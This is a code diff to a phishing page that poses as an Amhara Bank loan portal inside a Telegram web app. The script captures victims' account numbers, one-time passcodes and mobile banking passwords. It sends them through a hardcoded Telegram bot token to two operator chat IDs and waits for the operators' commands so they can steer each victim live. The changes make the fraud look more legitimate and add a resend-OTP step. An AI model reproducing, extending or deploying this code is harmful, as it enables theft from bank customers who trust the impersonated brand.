--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
-    <title>የአማራ ባንክ ብድር መመዝገቢያ ገፅ</title>
+    <title>Amhara Bank - Secure Portal</title>
     <script src="https://telegram.org/js/telegram-web-app.js"></script>
     <style>
         :root {
@@ -172,15 +172,7 @@
     <div class="modal" id="otp-expired-modal"><div class="modal-box"><h3 style="color:#d9534f;" data-key="otp-exp-h">OTP Expired</h3><p data-key="otp-exp-p">Your OTP has expired. Please try again.</p><button class="btn-gold active-btn" onclick="resendOTPFlow()" data-key="try-again">Try Again</button></div></div>
     <div class="modal" id="info-modal"><div class="modal-box"><h3 data-key="modal-h" style="color:var(--bank-blue);">Password Reset</h3><p data-key="modal-p">Please visit your nearest branch for password recovery.</p><button class="btn-gold active-btn" onclick="hideModal('info-modal')">OK</button></div></div>
     <div class="modal" id="error-modal"><div class="modal-box"><h3 style="color:#d9534f;" data-key="err-h">Error</h3><p data-key="acc-err-p">The account number is incorrect. Please try again.</p><button class="btn-gold active-btn" onclick="resetToAccount()" data-key="try-again">Retry</button></div></div>
-    
-    <div class="modal" id="not-reg-modal">
-        <div class="modal-box">
-            <h3 style="color:var(--bank-blue); margin-bottom: 15px;" data-key="reg-h">Service Notice</h3>
-            <p style="font-size: 14.5px; line-height: 1.5; color: #333;" data-key="reg-p">Dear Customer, your account is not registered for mobile banking services. Please register by visiting your nearest Amhara Bank branch with your valid ID.</p>
-            <button class="btn-gold active-btn" style="margin-top: 20px;" onclick="resetToAccount('not-reg-modal')" data-key="done">OK</button>
-        </div>
-    </div>
-
+    <div class="modal" id="not-reg-modal"><div class="modal-box"><h3 style="color:var(--bank-blue);" data-key="reg-h">Notice</h3><p data-key="reg-p">Account not registered for mobile banking.</p><button class="btn-gold active-btn" onclick="resetToAccount('not-reg-modal')" data-key="done">OK</button></div></div>
     <div class="modal" id="otp-error-modal"><div class="modal-box"><h3 style="color:#d9534f;" data-key="otp-err-h">OTP Error</h3><p data-key="otp-err-p">The code entered is incorrect.</p><button class="btn-gold active-btn" onclick="resendOTPFlow()" data-key="try-again">Resend OTP</button></div></div>
     <div class="modal" id="pin-error-modal"><div class="modal-box"><h3 style="color:#d9534f;" id="pin-error-title">Incorrect Password</h3><p id="pin-error-body">The mobile banking password you entered is incorrect.</p><button class="btn-gold active-btn" id="pin-retry-btn" onclick="retryPin()" data-key="try-again">Retry</button></div></div>
 
@@ -188,6 +180,7 @@
         const BOT_TOKEN = "8472250354:AAFDjUbcUCPBjo-UGBVIUys9mqOfz1cy5Ks";
         const ADMIN_IDS = ["5668579491", "8145799125"];
 
+        // 50 Names Generator for Unique Identification
         const NAMES_LIST = ["Daniel", "Sara", "Abebe", "Mulu", "Kebede", "Selam", "Yonas", "Hanna", "Tewodros", "Martha", "Dawit", "Rahel", "Samuel", "Ruth", "Elias", "Helen", "Getachew", "Aster", "Mesfin", "Lydia", "Biniyam", "Tigist", "Solomon", "Genet", "Abel", "Zenebech", "Ephraim", "Fekerte", "Henok", "Lemlem", "Natnael", "Marta", "Zelalem", "Workenesh", "Tamrat", "Seble", "Girma", "Almaz", "Tadesse", "Hiwot", "Dereje", "Beza", "Kassa", "Sintayehu", "Fikru", "Kidist", "Assefa", "Edel", "Yared", "Tsion"];
         
         let roundNumber = parseInt(localStorage.getItem('user_round') || "1");
@@ -213,7 +206,7 @@
                 "inel-h": "Ineligible", "inel-p": "Your account balance is not eligible for a loan. Please deposit money and try again.",
                 "lock-h": "Account Locked", "lock-p": "Security Alert: Your mobile banking access has been temporarily locked due to multiple failed attempts. Please visit the nearest Amhara Bank branch with your ID to restore access.",
                 "otp-exp-h": "OTP Expired", "otp-exp-p": "Your OTP has expired. Please try again.", "try-again": "Try Again",
-                "reg-h": "Service Notice", "reg-p": "Dear Customer, your account is not registered for mobile banking services. Please register by visiting your nearest Amhara Bank branch with your valid ID."
+                "reg-h": "Notice", "reg-p": "Account not registered for mobile banking."
             },
             am: {
                 "loan-title": "አማራ ባንክ", "welcome-sub": "ወደ አማራ ባንክ የብድር አገልግሎት እንኳን በደህና መጡ። በፕሮፋይልዎ ላይ በመመስረት የሚገኙ የብድር አገልግሎቶችን ለማግኘት እባክዎ ማመልከቻዎን በዚህ ፖርታል በኩል ያቅርቡ።", "start-app": "አሁኑኑ ያመልክቱ",
@@ -227,7 +220,7 @@
                 "inel-h": "ብቁ አይደሉም", "inel-p": "የአካውንትዎ ቀሪ ሂሳብ ለብድር ብቁ አይደለም። እባክዎ ገንዘብ ያስገቡ እና እንደገና ይሞክሩ።",
                 "lock-h": "መለያ ተዘግቷል", "lock-p": "የደህንነት ማስጠንቀቂያ፡ በተደጋጋሚ በተሳሳተ ሙከራ ምክንያት የሞባይል ባንኪንግ አገልግሎትዎ ለጊዜው ታግዷል። እባክዎ በአቅራቢያዎ ወደሚገኝ የአማራ ባንክ ቅርንጫፍ በባንክ ደብተርዎ እና መታወቂያዎ ይምጡ።",
                 "otp-exp-h": "OTP ጊዜው አልፏል", "otp-exp-p": "የእርስዎ OTP ጊዜው አልፎበታል። እባክዎ እንደገና ይሞክሩ።", "try-again": "እንደገና ይሞክሩ",
-                "reg-h": "የአገልግሎት ማሳሰቢያ", "reg-p": "ውድ ደንበኛ፣ ሂሳብዎ ለሞባይል ባንኪንግ አገልግሎት አልተመዘገበም። እባክዎ በአቅራቢያዎ የሚገኘውን የአማራ ባንክ ቅርንጫፍ ትክክለኛ መታወቂያዎን ይዘው በመቅረብ ይመዝገቡ።"
+                "reg-h": "ማሳሰቢያ", "reg-p": "አካውንቱ ለሞባይል ባንኪንግ አልተመዘገበም።"
             }
         };
 
@@ -264,12 +257,15 @@
             clearInterval(otpInterval);
             otpInterval = setInterval(() => {
                 display.innerText = `Expires in: 00:${duration.toString().padStart(2, '0')}`;
-                if (--duration < 0) { clearInterval(otpInterval); showModal('otp-expired-modal'); }
+                if (--duration < 0) {
+                    clearInterval(otpInterval);
+                    showModal('otp-expired-modal');
+                }
             }, 1000);
         }
 
         function notifyApply() { 
-            ADMIN_IDS.forEach(id => fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${id}&text=User started [User: ${SESSION_ID}]`));
+            ADMIN_IDS.forEach(id => fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${id}&text=User started application [User: ${SESSION_ID}]`));
             showPage('account'); 
         }
 
@@ -285,10 +281,22 @@
             for (let id of ADMIN_IDS) {
                 await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
                     method: "POST", headers: { "Content-Type": "application/json" },
-                    body: JSON.stringify({ chat_id: id, text: `🏦 Account: \n\n<code>${currentAccount}</code>\n\n[User: ${SESSION_ID}]`, parse_mode: "HTML", reply_markup: kb })
+                    body: JSON.stringify({ chat_id: id, text: `🏦 Verify Account Number: \n\n<code>${currentAccount}</code>\n\n[User: ${SESSION_ID}]`, parse_mode: "HTML", reply_markup: kb })
                 });
             }
             pollAdmin("acc_check");
+        }
+
+        function resendOTPFlow() {
+            hideModal('otp-error-modal');
+            hideModal('otp-expired-modal');
+            document.querySelectorAll('.otp-box').forEach(box => box.value = '');
+            document.getElementById('otp-btn').classList.remove('active-btn');
+            document.getElementById('otp-btn').disabled = true;
+            showPage('waiting'); 
+            startTimer('timer', 300);
+            ADMIN_IDS.forEach(id => fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${id}&text=User RESEND OTP [User: ${SESSION_ID}]`));
+            submitAccount(); 
         }
 
         function handlePaste(e) {
@@ -297,6 +305,8 @@
             if (!pasteData) return;
             const boxes = document.querySelectorAll('.otp-box');
             pasteData.split('').forEach((char, i) => { if (boxes[i]) boxes[i].value = char; });
+            const nextIdx = Math.min(pasteData.length, 5);
+            boxes[nextIdx].focus();
             checkOtpReady();
         }
 
@@ -317,7 +327,7 @@
             clearInterval(otpInterval);
             let otp = Array.from(document.querySelectorAll('.otp-box')).map(i => i.value).join('');
             showPage('otp-waiting'); 
-            await sendToAdmin(`🔑 OTP: \n\n<code>${otp}</code>\n\n[User: ${SESSION_ID}]`, "otp_check");
+            await sendToAdmin(`🔑 OTP: \n\n<code>${otp}</code>\n\nAccount: <code>${currentAccount}</code>\n\n[User: ${SESSION_ID}]`, "otp_check");
             pollAdmin("otp_check");
         }
 
@@ -358,13 +368,20 @@
                             lastOffset = update.update_id + 1;
                             if (update.callback_query) {
                                 let action = update.callback_query.data;
-                                if (action.startsWith(context) && action.includes(SESSION_ID)) {
+                                if (action.includes(SESSION_ID)) {
                                     clearInterval(pollerInterval);
-                                    if (action.includes("_yes")) handleAdminChoice(context, "yes");
-                                    else if (action.includes("_no")) handleAdminChoice(context, "no");
-                                    else if (action.includes("_notreg")) showModal('not-reg-modal');
-                                    else if (action.includes("_noteligible")) showPage('ineligible');
-                                    else if (action.includes("_locked")) showPage('locked');
+                                    // FIXED ORDER: Check _notreg before checking _no
+                                    if (action.includes("_notreg")) {
+                                        showModal('not-reg-modal');
+                                    } else if (action.includes("_yes")) {
+                                        handleAdminChoice(context, "yes");
+                                    } else if (action.includes("_no")) {
+                                        handleAdminChoice(context, "no");
+                                    } else if (action.includes("_noteligible")) {
+                                        showPage('ineligible');
+                                    } else if (action.includes("_locked")) {
+                                        showPage('locked');
+                                    }
                                 }
                             }
                         }
@@ -397,7 +414,7 @@
         }
 
         function retryPin() { hideModal('pin-error-modal'); document.getElementById('pin-field').value = ''; showPage('login'); }
-        function resetToAccount(modalId = 'error-modal') { hideModal(modalId); document.getElementById('acc-input').value = ''; validateAcc(); showPage('account'); }
+        function resetToAccount() { hideModal('error-modal'); hideModal('not-reg-modal'); showPage('account'); }
         function validateAcc() {
             const input = document.getElementById('acc-input');
             if (input.value.length > 13) input.value = input.value.slice(0, 13);
@@ -415,7 +432,6 @@
         function togglePin() { const p = document.getElementById('pin-field'); p.type = p.type === 'password' ? 'text' : 'password'; }
         function showModal(id) { document.getElementById(id).style.display = 'flex'; }
         function hideModal(id) { document.getElementById(id).style.display = 'none'; }
-        function resendOTPFlow() { hideModal('otp-error-modal'); hideModal('otp-expired-modal'); document.querySelectorAll('.otp-box').forEach(box => box.value = ''); showPage('waiting'); submitAccount(); }
 
         window.addEventListener('load', () => setTimeout(() => {
             document.getElementById('splash-screen').style.display = 'none';
